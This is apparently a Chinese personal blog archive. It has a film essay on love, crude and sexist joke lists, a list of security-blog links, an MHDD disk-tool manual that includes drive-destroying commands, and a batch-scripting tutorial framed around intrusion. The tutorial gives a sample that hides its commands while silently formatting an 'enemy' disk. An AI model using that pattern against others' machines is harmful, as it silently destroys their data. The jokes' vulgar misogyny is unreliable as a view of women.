爱无须掩饰无须矫做无须患得患失,只要像紫霞一样说:“让我们立刻开始这段感情吧!先亲我一下。”
爱是身不由己。
晶晶口中道:“我再也不会为这个男人心痛了。”可还是要为他拔剑与人拼命。
至尊宝梦中也要叫紫霞的名字七百四十一次,不知道的人觉得紫霞一定欠了他很多钱。
    
紫霞说:“就象飞蛾,明知会受伤也要扑到火上。” “我无力抗拒,向你狂奔去。”无可救药的痴迷。
爱是奋不顾身。
    
至尊宝对晶晶说:“你杀了我吧,我不希望你看我的时候心里却想着别的人。”
晶晶以为:“都是骗我的。”跳下崖去。
紫霞把身体挡在至尊宝面前,刺进牛魔王的铁叉里。
一时间,以后的人生如何,大家都无所谓了。连那样宝贵的性命,也打算随时给爱情作了祭品。一个个一头扎进这情爱苦海,宁愿永生永世不得超生。
爱深刻莫测。
    
三十娘流着泪说:“想我春三十娘貌美如花,却跟这么丑的人有了。” 这是多少美丽自负的女子的宿命:心中的他是能文能武翩翩少年,枕边人却鼾声如雷大腹便便。谁敢说多年后眼望自己的丈夫不会有如此感觉,真不知幸福还是心酸。不过还是要为他挺身而去无限牺牲,像春三十娘为八戒放下断龙石与牛魔王同归于尽。
    
晶晶爱悟空,至尊宝爱晶晶,紫霞爱至尊宝,“他爱你你爱我我爱他”,千古无解的方程。《白马啸西风》里说:“如果你深深爱着的人,却又深深爱上了别人,能有什么法子?”
    
所以紫霞说:“爱一个人原来是那么痛苦。” 晶晶找不到那个抛弃她的悟空(象不象殷离),告诉至尊宝:“你经过五百年回来要找的不是我。”当年被他推开的紫霞已经悄无声息地抵达他灵魂的最深处,而他却不自知。可紫霞死了:“我的意中人是个盖世英雄,有一天他会踩着七色的云彩来娶我,我猜中了前头,可是我猜不着这结局……”
没有人猜得中结局,一切随风而去。
    
恋爱的时候我们都不懂爱情,懂得爱情后却失去了可以相爱的时光。
    
最绝望不是他不爱你或他离你而去,最绝望是你忘记了怎么去爱一个人,你已丧失了爱的能力。
    
请记住下面的台词:“曾经有一份真诚的爱情摆在我的面前,但是我没有珍惜。等到了失去的时候才后悔莫及,尘世间最痛苦的事莫过于此。如果上天可以给我一个机会再来一次的话,我会对你说三个字“我爱你”。如果非要把这份爱加上一个期限,我希望是一万年!” 也顺便记住这段话的原版,在王家卫的《重庆森林》里:“如果记忆是一个罐头,我希望它永远都不会过期,如果一定要加上一个期限的话,我希望是一万年。”
    
至尊宝第一次说这番话是骗紫霞,第二次说已痛不欲生。 总有一天,你会在灵魂最温柔的一隅为她重复这段话,为了你们即将封存的一万年。 “如果有一天我忍不住问你,你一定要骗我。不管你心里有多么不愿意,你都不要告诉我你从来没有喜欢过我。”
    
此情可待成追忆
  只是当时已惘然!

类别: 无分类 |  评论(0) |  浏览(20919) |  收藏
2007年04月08日 11:48:20

06 年 总结

006年工作总结:
这年头,
大棚把季节搞乱,
小姐把辈份搞乱,
关系把程序搞乱,
级别把能力搞乱,
公安把秩序搞乱,
金钱把官场搞乱,
手机把家庭搞乱!
这年头,
老婆像小灵通经济实惠但限本地使用,
二奶像中国电信安全固定但带不出门,
小蜜像中国移动使用方便但话费太贵。
情人像中国联通优雅新潮但常不在服务区!
这年头,
一哥们说北京地铁拥挤不堪他怀孕的老婆竟被挤流产了;
昨天他问上海的地铁是不是好些,
上海的哥们说更糟:
上个月他老婆乘地铁竟然被挤怀孕了!
这年头,
教授摇唇鼓舌,
四处赚钱,
越来越像商人;
商人现身讲坛,
著书立说,
越来越像教授。
医生见死不救,
草菅人命,
越来越像杀手;
杀手出手麻利,
不留后患,
越来越像医生。
明星卖弄风骚,
给钱就上,
越来越像妓女;
妓女楚楚动人,
明码标价,
越来越像明星。
警察横行霸道,
欺软怕硬,
越来越像地痞;
地痞各霸一方,
敢做敢当,
越来越像警察。
这年头,
军委领导说解放军的工资如果翻四倍可以打美国,
翻三倍可以打日本,
翻两倍可以打台湾,
翻一倍可以回家打老婆,
现在的工资回家被老婆打

类别: 无分类 |  评论(0) |  浏览(18100) |  收藏
2007年03月14日 02:52:56

恐怖份子和女人有什么不同

1. 一個可以談條件、一個不可以。

2. 恐怖份子明確地告訴你他們要什麼,女人總是要你猜她們要什麼。

3. 恐怖份子會跟你談判,而你不能跟女人 談判。

4. 恐怖份子會殺害人質,但是女人不會這 樣做,她們只會綁架人質一輩子。

5. 遇到恐怖份子,你只有死路一條。遇到 女人,你會活在十八層地獄。 [生不如死]

6. 恐怖份子用別人來談條件,女人用自己 來談條件。

7. 跟恐怖份子談判,贖金可能越談越少。 跟女人談判,要花的錢可能越談越多。 (沒有籌碼的話還是少談為妙)

8. 談判中你可能可以找一堆人和警察來抓 恐怖份子,可是通常女人會找一堆人和警察來找你麻煩。

9. 女人把褲襪戴在腳上,恐怖份子把褲襪 套在頭上。

10. 男人敢退去女人腳上的褲襪,卻不敢退去恐怖 份子頭上的褲襪。

11. 恐怖份子不一定是女人,但女人一定 是恐怖份子

类别: 无分类 |  评论(0) |  浏览(25757) |  收藏
2007年02月01日 04:47:37

鱼和胸罩不可兼得--变态网名大集合

 1、 十年树木,百年树袋熊

  2、 鱼和胸罩不可兼得

  3、 别说吃你几个烂西瓜,老子在城里吃冬瓜都不要钱

  4、 爬上奔驰的骏马,象骑上飞快的火车

  5、 老鼠上了猫

  6、 少年包工头

  7、 拿什么拯救你的爱人

  8、 拿什么拯救你和我的爱人

  9、 你拿什么拯救我,爱人

  10、 拿啥拯救你,我的大兵瑞恩

  11、 是你让我明白爱情这东西,四个字:冷酷到底!我宁愿你冷酷到底,也不愿再伤心一次。你应该在车底,我应该在车里,让我开车压死你!

  12、 千斤拨四两

  13、 化腐朽为绵掌

  14、 牛不群

  15、 马无季

  16、 善思而李

  (因为我叫李善思)

  17、 基努·李善思(还是因为我叫李善思)

  18、 给我一个支点,我可以撑起地球仪

  19、 悄悄地进庄,打飞机的不要

  20、 人过留名,雁过留声机

  21、 常在河边走,哪能不诗人?

  22、 考拉是条狗

  23、 卡拉是条ok

  24、 爱护环境,人人有病

  25、 千里送鹅毛,纯粹是傻逼

  26、 我是天蝎,我是你爹

  27、 谁在用我心爱的土琵琶,弹着一曲东风破

  28、 刀是什么样的刀,金丝大环刀;剑是什么样的剑,闭月羞光剑……人是什么样的人,飞檐走壁的人,美女爱英雄……

  29、 内行看门道,外行看老道

  30、 内行看门道,外行看人行道

  31、 内练一口气,外练一口屁

  32、 起来,不愿坐着的人们

  33、 哈里波霸

  34、 太平间公主

  35、 只羡鸳鸯不献血

  36、 早知今日,何必当鸡

  37、 穷人的孩子早出家

  38、 敢笑黄安不丈夫

  39、 吃的是草,挤出来的是青春痘

  40、 绞尽乳汁

  41、中暑山庄

  42、降龙罗宾汉

  43、车到山前是死路

  44、塞翁失身,焉知非福

  45、一顺到底才叫床

  46、我拿什么整死你,我的爱人

  47、成吉思春

  48、动力火锅

  49、做贼肾虚

  50、米老鼠和刘老根

  51、肾虚道长

  52、射鲸英雄传

  53、神鲸大侠

  54、路边野花不要,踩!

  55、常在河边走,哪能不失足

  56、伟大的大伟

  57、大能猫

  58、小白免

  59、大灰很

  60、武大娘

  61、天涯何处无芳草,还是母乳喂养好

  62、少年包青蛙

  63、爱新觉罗·释迦牟尼

  64、外婆家的铜锣湾

  65、时间就是生病

  66、 一针溅血

  67、狗直能生狗

  68、别人笑我太疯癫,我笑他人太风趣

  69、我们都是神枪手,没一个子弹消灭一个战友

  70、此地无银三百两,隔壁王家卫曾偷

  71、唐伯虎点电视

  72、其实不想走,其实想坐车

  73、听张国荣讲鬼故事

  74、我姓病,病尉迟

  75、名不正则言承旭

  76、清明上坟图

  77、我妹有钱,我不要脸

  78、大哥,我是你叔叔

  79、流星,蝴蝶,结

  80、圆月豌豆

  81、当年的逗泥湾,到处是荒山

  82、四个字:坚持到底哦~~

  83、爱在戏院前

  84、三十六计,西游计

  85、我妈升了,我爸上调了

  86、cctv果冻爽

  87、黔驴妓院

  88、有钱的捧个钱场,没钱的捧个火葬场

  89、在这个大喜的日子里,我们感到万分悲痛

  90、要命没有,要钱有一条

  91、你妹发骚

  92、都来发烧拉稀

  93、来瓶82年的矿泉水

  94、别拿83年的xo糊弄我,来瓶今年的

  95、九九一十八

  96、人,最宝贵的是生病

  97、我什么都有,就是没钱

  98、男生进女厕,心情多快乐

  99、少年不流氓,发育不正常

  100、别人笑我太疯癫,我笑他人太正经

  101、我站在布拉格黄昏火葬场

  102、相声是一门人体艺术,讲究坑、蒙、拐、骗……

  103、嘿,蛋炒饭

  104、春天花开会

  105、我在马路边丢了一分钱

  106、我要回唐山

  107、以前我长发飘逸,跟贝多芬似的,就是被你摸的,摸成了齐达内,你还摸,想把我摸成罗那尔多啊你,好好好,你摸吧,你就是把我摸成光头裁判克里纳我也不说你了。

  108、王小鸭

  109、出学留国

  110、寡妇门前趣多多

  111、独脚戏

  112、可爱的蓝精神病

  113、这个字念“瓿”

  114、一千块一夜

  115、黑洲非人

  116、何仙姑倒拔垂杨柳

  117、生于忧患,死于安而乐也。

  118、画足添蛇

  119、卡拉是调料

  120、鲁智深三打白骨精

  121、农夫三拳

  122、还记得年少时的猛犸

  123、九千九百九十九朵煤气罐

  124、新婚之夜,查里一世

  125、我有一只小小鸟

  126、夜阑卧听风吹雨,星矢冰河入梦来

  127、风声雨声黄秋声,声声入耳;国事家事少林寺,寺寺关心

  128、我这人有人气,还有脚气

类别: 无分类 |  评论(0) |  浏览(15977) |  收藏
2006年11月03日 17:33:07

牛人网址

http://seclab.mblogger.cn/ http://blog.xfocus.net/ 安全博客 可以看到几个牛人的BLOG
http://www.rons.net.cn/ 于洪峰
http://www.hoky.org/ hoky
http://www.netxeyes.org/ 小榕
http://seclab.mblogger.cn/xhacker 王亮(小叮当/xhacker)
http://www.gxgl.com/ 桂林老兵
http://www.521364.com http://www.foxnest.net/ RedFox
http://netfan.ispace.cn 稻草人
http://netfox.xicp.net/ Smokeing.MAN
http://www.neeao.info/lbs/ neeao
http://xiaomutou.51.net/ciker/blog/index.php 红衣刺客
http://www.hackdiy.com/ 明小子
http://security.zz.ha.cn/ 宫一鸣(中盟)
http://www.ns-one.com rootshell的个人主页
http://www.janker.org/ 孤独剑客
http://www.sunx.org sunx的个人主页
http://www.driverdevelop.com/lu0/ 陆麟的主页
http://myzky.blogdriver.com 蓝屏
http://www.icyfoxlovelace.com/冰狐浪子
http://www.xpfox.com/ xpfox
http://lis0.126.com liso
http://www.syue.com/ 猪猪
http://risker.org/ http://blog.xfocus.net/index.php?blogId=1 野路子
http://lake2.512j.com/ lake2
http://www.jorking.com jorking
http://www.flashsky.org/ FlashSky
http://www.n0p.org/index.php http://lilo.name/BLog/ lion
http://666w.com xiaolu
http://www.apple317.com/catblog/default.asp cat
http://www.sevenline.org/ sevenline
http://andy.126x.net/ andy
http://www.80189.info/ hotkey
http://haiyang.net/safety/book/ lcx
http://www.eviloctal.com/weblog/blog.php 冰血封情
http://www.blogcn.com/User8/flier_lu/index.html Flier's Sky
http://wawa.haowawa.cn/ haowawa
http://zjisp.vicp.net/ phoenix
http://demonalex.blogdriver.com/demonalex/ demonalex
http://www.freewebs.com/lintao520/index.htm Lintao520
http://www.feelids.com/blog/?play 慕容小语
http://ziqi.512j.com/blog.php 紫琦
http://free1.e-168.cn/~xrens/blog.php 孤山一笑
http://itaq.ynpc.com/itsbbs/ Jambalaya
http://blog.csdn.net/sunwear/ sunwear
http://hacker.lygweb.com/ http://net2k.91x.net http://www.blogcn.com/user17/net2k/index.html Net2k
http://sbaa.3322.org/ sbaa
http://kaka.rootcn.com/ http://blog.0x557.org/kaka/ kaka
http://www.yanbing.org/ 南阳岩冰
http://www.hackerxfiles.net/python/index.htm python
http://www.cnwill.com/blog/safer/ safer
http://www.4ngel.net/blog/angel/ angel
http://www.4ngel.net/blog/sniper sniper
http://lo7e4l.tianyablog.com lo7e4l
http://www.cnwill.com/blog/lanker/ lanker
http://www.4ngel.net/blog/hei/ superhei
http://scd.name/ scd
http://13k.kanpp.com/ 13k
http://fox.he100.com/ fox
http://pub98.com/blog/ 云舒
http://www.chinasafe.net/ Fa1l3n
http://blog.xfocus.net/index.php?blogId=3 http://secu.zzu.edu.cn/ 包子
http://tuz.0x557.net/ tuz
http://www.XF2s.Com 枫三少
http://andy.126x.net/ andy
http://totododo.phphot.com/blog/ totododo
http://www.powers.com.cn powers
http://seclab.mblogger.cn/Zer4tul/ 暗黑圣堂
http://seclab.mblogger.cn/sumi sumi
http://dupi.mblogger.cn/ zeta
http://ann.wukongsun.com/ ann
http://seclab.mblogger.cn/dandy/ dandy
http://www2.ykzj.org/ ykzj.
http://digest.qq.com/1981821/ 雪精灵
http://www.sunx.org/ sunx
http://www.138soft.com 陈经韬
http://security.zz.ha.cn/ 起点安全
http://www.yourblog.org/Blogger/20047/CKXP_34831.html 古典辣M°的博客
http://10wwhy.blogchina.com/ 辣妹's 博客
http://009.iblue.cn/ 009
http://sgzlove.computer.mblogger.cn/ 谢飞
http://ljjk.home.sunbo.net/ 灵鸠剑客
http://main.xxiyy.com/ mikespook (黄金眼的作者)

类别: 无分类 |  评论(0) |  浏览(18811) |  收藏
2006年11月03日 17:25:45

硬盘检测工具——MHDD

MHDD 4.6
推荐一款硬盘检测工具——MHDD

推荐大家以后使用MHDD来检测硬盘,十分准确。我把那台闹心的T23卖给本地JS了,JS检测硬盘就用了这个工具,查到了4个访问时间大于500ms的疑似坏道,17个访问时间在150~500ms之间的磁道。

如果使用HD Tune,这些都不会被发现。可以用软盘或光盘作为载体,DOS下检测,绝对能发现很多HD Tune漏掉的问题。

附带:网上找的使用说明!

硬盘专业检测维修软件MHDD使用方法
  1、MHDD是俄罗斯Maysoft公司出品的专业硬盘工具软件,具有很多其他硬盘工具软件所无法比拟的强大功能,它分为免费版和收费的完整版,本文介绍的是免费版的详细用法。
  2、MHDD无论以CHS还是以LBA模式,都可以访问到128G的超大容量硬盘(可访问的扇区范围从512到137438953472),即使你用的是286电脑,无需BIOS支持,也无需任何中断支持;
  3、MHDD最好在纯DOS环境下运行;
  4、MHDD可以不依赖于主板BIOS直接访问IDE口,但要注意不要使用原装Intel品牌主板;
  5、不要在要检测的硬盘中运行MHDD;
  6、MDD在运行时需要记录数据,因此不能在被写保护了的存储设备中运行(比如写保护的软盘、光盘等);
  MHDD命令详解
  EXIT(热键Alt+X):退出到DOS。
  ID:硬盘检测,包括硬盘容量、磁头数、扇区数、SN序列号、Firmware固件版本号、LBA数值、支持的DMA级别、是否支持HPA、是否支持AAM、SMART开关状态、安全模式级别及开关状态……等)。
  INIT:硬盘初始化,包括Device Reset(硬盘重置)、Setting Drive Parameters(设定硬盘参数)、Recalibrate(重校准)。
  I(热键F2):同时执行ID命令和INIT命令。
  ERASE:快速删除功能,每个删除单位等于255个扇区(数据恢复无效)。
  AERASE:高级删除功能,可以将指定扇区段内的数据逐扇区地彻底删除(比ERASE慢,数据恢复同样无效),每个删除单位等于1个扇区。
  HPA:硬盘容量剪切功能,可以减少硬盘的容量,使BIOS检测容量减少,但DM之类的独立于BIOS检测硬盘容量的软件仍会显示出硬盘原始容量。
  NHPA:将硬盘容量恢复为真实容量。
  RHPA:忽略容量剪切,显示硬盘的真实容量。
  CLS:清屏。
  PWD:给硬盘加USER密码,最多32位,什么也不输入表示取消。被锁的硬盘完全无法读写,低格、分区等一切读写操作都无效。如果加密码成功,按F2键后可以看到Security一项后面有红色的ON。要注意,设置完密码后必须关闭电源后在开机才会使密码起作用;
  UNLOCK:对硬盘解锁。先选择0(USER),再正确输入密码。注意:选择1(Master)无法解开密码。
  DISPWD:解除密码,先选择0(USER),再正确输入密码。在用DISPWD之前必须先用UNLOCK命令解锁。要注意,除了用UNLOCK和DISPWD命令可以解密码之外,没有任何办法可以解锁。而且一旦将密码遗忘(或输入错误),也没有任何办法可以解锁。如果解密码成功,按F2键后可以看到Security一项后面有灰色的OFF。注意:选择1(Master)无法解开密码。
  RPM:硬盘转速度量(非常不准,每次测量数值都不同)。
  TOF:为指定的扇区段建立映像文件(最大2G)。
  FF:从映像文件(最大2G)恢复为扇区段。
  AAM:自动噪音管理。可以用AAM(自动噪音管理)命令“所听即所得”式的调节硬盘的噪音。按F2键后如果有AAM字样,就表示硬盘支持噪音调节。键入AAM命令后,会显示出当前硬盘的噪音级别,并且可以马上就听到硬盘的读写噪音,要注意硬盘的噪音和性能是成正比的,噪音越大,性能越高,反之亦然。进入AAM命令后,按0键可以关闭AAM功能,按M键可以将噪音调至最小(性能最低),按P键可以将噪音调至最大(性能最高),按+加号和-减号可以自由调整硬盘的噪音值(数值范围从0到126),按L键可以获得噪音和性能的中间值(对某些硬盘如果按+加号和-减号无效,而又不想让噪音级别为最大或最小,可以按L键取噪音中间值),按D键表示关闭AAM功能,按ENTER键表示调整结束;
  FDISK:快速地将硬盘用FAT32格式分为一个区(其实只是写入了一个MBR主引导记录),并设为激活,但要使用还需用FORMAT完全格式化。
  SMART:显示SMART参数,并可以对SMART进行各项相关操作。SMART ON可以开启SMART功能,SMART OFF可以关闭SMART功能,SMART TEST可以对SMART进行检测。
  PORT(热键Shift+F3):显示各IDE口上的硬盘,按相应的数字即可选择相应口的硬盘,之后该口会被记录在/CFG目录下的MHDD.CFG文件中,1表示IDE1口主,2表示IDE1口从,3表示IDE2口主,4表示IDE2口从,下次再进入MHDD后此口就成了默认口,编辑MHDD.CFG文件改变该值就可以改变MHDD默认的检测端口。所以,如果进入MHDD后按F2提示Disk Not Ready,就说明当前硬盘没有接在上次MHDD默认的那个口上,此时可以使用PORT命令重新选择硬盘(或更改MHDD.CFG文件)。
  CX:对昆腾CX和LCT(包括LA、LB、LC)系列硬盘进行寻道测试,可以考验这两类硬盘上的飞利浦TDA5247芯片的稳定性(因为质量不好的5247芯片在频繁寻道时最容易露出马脚)。按ESC键停止。此命令也可用在其他硬盘上,它主要通过频繁随机寻道来提升硬盘电机驱动芯片的温度,从而测试硬盘在强负荷下的稳定性。
  WAIT:等待硬盘就位。
  STOP(热键Shift+F4):关闭硬盘马达。
  IBME:查看IBM硬盘缺陷表(P-LIST)。此时要记录大量数据,缺陷表越大,生成的文件(在IBMLST目录下)越大,如果MHDD存在软盘上的话,有可能会空间不足;
  FUJLST:查看富士通硬盘缺陷表(P-LIST)。此时要记录大量数据,缺陷表越大,生成的文件(在FUJLST目录下)越大,如果MHDD存在软盘上的话,有可能会空间不足;
  MAKEBAD:人为地在某个指定区域内制造坏道。注意,由它生成的坏道很难修复。
  RANDOMBAD:随机地在硬盘的各个地方生成坏道,按ESC键停止生成。注意,由它生成的坏道很难修复。
  BATCH(热键F5):批处理。
  R(热键F3):硬盘复位。比如使用了PWD加密码后,为了使密码马上生效,可以用此命令。
  F*U*FUJ、KILLFUJ、AKILLFUJ:都是刻意破坏富士通硬盘的命令,一定谨慎使用,否则硬盘将被彻底损坏,无法修复。某一切正常的富士通硬盘,在使用F*U*FUJ命令后,仅一、两秒种,就提示破坏成功,重新启动后,连自检动作都消失了,主板检测不到,硬盘彻底报废。
  SCAN(热键F4):盘面扫描,可以用特定模式来修复坏扇区,其中:
  [Scan in: CHS/LBA]:以CHS或LBA模式扫描。CHS只对500M以下的老硬盘有效。
  [Starting CYL]:设定开始扫描的柱面。
  [Starting LBA]:设定开始扫描的LBA值。
  [Log: On/Off]:是否写入日志文件。
  [Remap: On/Off](重新映像):是否修复坏扇区。
  [Ending CYL]:设定终止扫描的柱面
  [Ending LBA]:设定终止扫描的LBA值。
  [Timeout(sec)]:设定超时值,从1到200,默认值为30。
  [Advanced LBA log](高级LBA日志):此项不支持。
  [Standby after scan]:扫描结束后关闭硬盘马达,这样即可使SCAN扫描结束后,硬盘能够自动切断供电,但主机还是加电的(属于无人职守功能)。
  [Loop the test/repair]:循环检测和修复,主要用于反复地修复顽固型坏道。
  [Erase WAITs](删除等待):此项主要用于修复坏道,而且修复效果要比REMAP更为理想,尤其对IBM硬盘的坏道最为奏效,但要注意被修复的地方的数据是要被破坏的(因为Erase WAITS的每个删除单位是255个扇区)。Erase WAITS的时间默认为250毫秒,数值可设置范围从10到10000。要想设置默认时间,可以打开/CFG目录下的MHDD.CFG文件,修改相应项目即可更改Erase WAITS数值。此数值主要用来设定MHDD确定坏道的读取时间值(即读取某扇区块时如果读取时间达到或超过该数值,就认为该块为坏道,并开始试图修复),一般情况下,不必更改此数值,否则会影响坏道的界定和修复效果。
  屏幕第一行的左半部分为为状态寄存器,右半部分为错误寄存器;在屏幕第一行的中间(在BUSY和AMNF之间)有一段空白区域,如果硬盘被加了密码,此处会显示PWD;如果硬盘用HPA做了剪切,此处会显示HPA;
  屏幕第二行的左半部分为当前硬盘的物理参数,右半部分为当前正在扫描的位置;
  屏幕右下角为计时器,Start表示开始扫描的时间,Time表示已消耗的时间,End表示预计结束的时间,结束后会再显示Time Count,表示总共耗费了多长的时间;
  在扫描时,每个长方块代表255个扇区(在LBA模式下)或代表63个扇区(在CHS模式下);
  扫描过程可随时按ESC键终止;
  方块从上到下依次表示从正常到异常,读写速度由快到慢。正常情况下,应该只出现第一个和第二个灰色方块;
  如果出现浅灰色方块(第三个方块),则代表该处读取耗时较多;
  如果出现绿色和褐色方块(第三个和第四个方块),则代表此处读取异常,但还未产生坏道;
  如果出现红色方块(第六个,即最后一个方块),则代表此处读取吃力,马上就要产生坏道;
  如果出现问号?,则表示此处读取错误,有严重物理坏道,无法修复。
  注1:有些读写速度奇慢的硬盘如果用MHDD的F4 SCAN扫描并把EraseWAITS打开就可以看到,要么均匀分布着很多W,要么就是遍布着很多五颜六色的方块,这说明这类硬盘之所以读写速度奇慢,就是因为大量的盘片扇区有瑕疵,造成读写每个扇区都会耗费较长的时间,综合到一起就导致了整个硬盘读写速度奇慢。
  注2:老型号硬盘(2、3G以下)由于性能较低、速度较慢,因此在F4 SCAN检测时很少出现第一个方块,而出现第二和第三个方块,甚至会出现第四个方块(绿色方块),这种情况是由于老硬盘读写速度慢引起的,并不说明那些扇区读写异常。
  在扫描时使用箭头键可以灵活地控制扫描的进程,很象VCD播放机:↑快进2%;↓后退2%;←后退0.1%;→快进0.1%。灵活运用箭头键,可以对不稳定、坏道顽固的区段进行反复扫描和修复。

类别: 无分类 |  评论(0) |  浏览(18477) |  收藏
2006年11月02日 00:14:31

批处理全攻略

标签:
一:
windows的命令行模式
(win+R)在里面写CMD就可以进入windows的命令行模式了
二 :
批处理文件
批处理文件是无格式的文本文件,它包含一条或多条命令。它的文件扩展名为 .bat 或 .cmd。在命令提示下键入批处理文件的名称,或者双击该批处理文件,系统就会调用Cmd.exe按照该文件中各个命令出现的顺序来逐个运行它们。使用批处理文件(也被称为批处理程序或脚本),可以简化日常或重复性任务。当然我们的这个版本的主要内容是介绍批处理在入侵中一些实际运用,例如我们后面要提到的用批处理文件来给系统打补丁、批量植入后门程序等。下面就开始我们批处理学习之旅吧。 (本文因篇幅较长,所以分成两部份。前半部份讲命令,后半部分讲实例分析。)
一、简单批处理内部命令简介
1.Echo 命令

打开回显或关闭请求回显功能,或显示消息。如果没有任何参数,echo 命令将显示当前回显设置。
语法
echo [{on off}] [message]
Sample:@echo off / echo hello world
在实际应用中我们会把这条命令和重定向符号(也称为管道符号,一般用> >> ^)结合来实现输入一些命令到特定格式的文件中.这将在以后的例子中体现出来。
2.@ 命令
表示不显示@后面的命令,在入侵过程中(例如使用批处理来格式化敌人的硬盘)自然不能让对方看到你使用的命令啦。
Sample:@echo off
@echo Now initializing the program,please wait a minite...
@format X: /q/u/autoset (format 这个命令是不可以使用/y这个参数的,可喜的是微软留了个autoset这个参数给我们,效果和/y是一样的。)
3.Goto 命令
指定跳转到标签,找到标签后,程序将处理从下一行开始的命令。
语法:goto label (label是参数,指定所要转向的批处理程序中的行。)
Sample:
if {%1}=={} goto noparms
if {%2}=={} goto noparms(如果这里的if、%1、%2你不明白的话,先跳过去,后面会有详细的解释。)
@Rem check parameters if null show usage
:noparms
echo Usage: monitor.bat ServerIP PortNumber
goto end
标签的名字可以随便起,但是最好是有意义的字母啦,字母前加个:用来表示这个字母是标签,goto命令就是根据这个:来寻找下一步跳到到那里。最好有一些说明这样你别人看起来才会理解你的意图啊。
4.Rem 命令
注释命令,在C语言中相当与/*--------*/,它并不会被执行,只是起一个注释的作用,便于别人阅读和你自己日后修改。
Rem Message
Sample:@Rem Here is the description.
5.Pause 命令
运行 Pause 命令时,将显示下面的消息:
Press any key to continue . . .
Sample:
@echo off
:begin
copy a:*.* d:\back
echo Please put a new disk into driver A
pause
goto begin
在这个例子中,驱动器 A 中磁盘上的所有文件均复制到d:\back中。显示的注释提示您将另一张磁盘放入驱动器 A 时,pause 命令会使程序挂起,以便您更换磁盘,然后按任意键继续处理
6.Call 命令
从一个批处理程序调用另一个批处理程序,并且不终止父批处理程序。call 命令接受用作调用目标的标签。如果在脚本或批处理文件外使用 Call,它将不会在命令行起作用。
语法 call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]]
参数
[Drive:}[Path] FileName
指定要调用的批处理程序的位置和名称。filename 参数必须具有 .bat 或 .cmd 扩展名。
7.start 命令
调用外部程序,所有的DOS命令和命令行程序都可以由start命令来调用。
入侵常用参数:
MIN 开始时窗口最小化
SEPARATE 在分开的空间内开始 16 位 Windows 程序
HIGH 在 HIGH 优先级类别开始应用程序
REALTIME 在 REALTIME 优先级类别开始应用程序
WAIT 启动应用程序并等候它结束
parameters 这些为传送到命令/程序的参数
执行的应用程序是 32-位 GUI 应用程序时,CMD.EXE 不等应用程序终止就返回命令提示。如果在命令脚本内执行,该新行为则不会发生。
8.choice 命令
choice 使用此命令可以让用户输入一个字符,从而运行不同的命令。使用时应该加/c:参数,c:后应写提示可输入的字符,之间无空格。它的返回码为1234……
如: choice /c:dme defrag,mem,end
将显示
defrag,mem,end[D,M,E]?
Sample:
Sample.bat的内容如下:
@echo off
choice /c:dme defrag,mem,end
if errorlevel 3 goto defrag (应先判断数值最高的错误码)
if errorlevel 2 goto mem
if errotlevel 1 goto end
:defrag
c:\dos\defrag
goto end
:mem
mem
goto end
:end
echo good bye
此文件运行后,将显示 defrag,mem,end[D,M,E]? 用户可选择d m e ,然后if语句将作出判断,d表示执行标号为defrag的程序段,m表示执行标号为mem的程序段,e表示执行标号为end的程序段,每个程序段最后都以goto end将程序跳到end标号处,然后程序将显示good bye,文件结束。
9.If 命令
if 表示将判断是否符合规定的条件,从而决定执行不同的命令。 有三种格式:
1、if "参数" == "字符串" 待执行的命令
参数如果等于指定的字符串,则条件成立,运行命令,否则运行下一句。(注意是两个等号)
如if "%1"=="a" format a:
if {%1}=={} goto noparms
if {%2}=={} goto noparms
2、if exist 文件名 待执行的命令
如果有指定的文件,则条件成立,运行命令,否则运行下一句。
如if exist config.sys edit config.sys
3、if errorlevel / if not errorlevel 数字 待执行的命令
如果返回码等于指定的数字,则条件成立,运行命令,否则运行下一句。
如if errorlevel 2 goto x2
DOS程序运行时都会返回一个数字给DOS,称为错误码errorlevel或称返回码,常见的返回码为0、1。
10.for 命令
for 命令是一个比较复杂的命令,主要用于参数在指定的范围内循环执行命令。
在批处理文件中使用 FOR 命令时,指定变量请使用 %%variable
for {%variable %%variable} in (set) do command [ CommandLineOptions]
%variable 指定一个单一字母可替换的参数。
(set) 指定一个或一组文件。可以使用通配符。
command 指定对每个文件执行的命令。
command-parameters 为特定命令指定参数或命令行开关。
在批处理文件中使用 FOR 命令时,指定变量请使用 %%variable
而不要用 %variable。变量名称是区分大小写的,所以 %i 不同于 %I
如果命令扩展名被启用,下列额外的 FOR 命令格式会受到
支持:
FOR /D %variable IN (set) DO command [command-parameters]
如果集中包含通配符,则指定与目录名匹配,而不与文件名匹配。
FOR /R [[drive:]path] %variable IN (set) DO command [command-
检查以 [drive:]path 为根的目录树,指向每个目录中的FOR 语句。如果在 /R 后没有指定目录,则使用当前目录。如果集仅为一个单点(.)字符,则枚举该目录树。
FOR /L %variable IN (start,step,end) DO command [command-para
该集表示以增量形式从开始到结束的一个数字序列。
因此,(1,1,5) 将产生序列 1 2 3 4 5,(5,-1,1) 将产生
序列 (5 4 3 2 1)。
FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN ("string") DO command
FOR /F ["options"] %variable IN (command) DO command
或者,如果有 usebackq 选项
FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN ("string") DO command
FOR /F ["options"] %variable IN (command) DO command
filenameset 为一个或多个文件名。继续到 filenameset 中的
下一个文件之前,每份文件都已被打开、读取并经过处理。
处理包括读取文件,将其分成一行行的文字,然后将每行
解析成零或更多的符号。然后用已找到的符号字符串变量值
调用 For 循环。以默认方式,/F 通过每个文件的每一行中分开
的第一个空白符号。跳过空白行。您可通过指定可选 "options"
参数替代默认解析操作。这个带引号的字符串包括一个或多个
指定不同解析选项的关键字。这些关键字为:
eol=c - 指一个行注释字符的结尾(就一个)
skip=n - 指在文件开始时忽略的行数
delims=xxx - 指分隔符集。这个替换了空格和跳格键的
默认分隔符集。
tokens=x,y,m-n - 指每行的哪一个符号被传递到每个迭代
的 for 本身。这会导致额外变量名称的
格式为一个范围。通过 nth 符号指定 m
符号字符串中的最后一个字符星号,
那么额外的变量将在最后一个符号解析之
分配并接受行的保留文本。
usebackq - 指定新语法已在下类情况中使用:
在作为命令执行一个后引号的字符串并且引号字符为文字字符串命令并允许在 fi中使用双引号扩起文件名称。
sample1:
FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do command
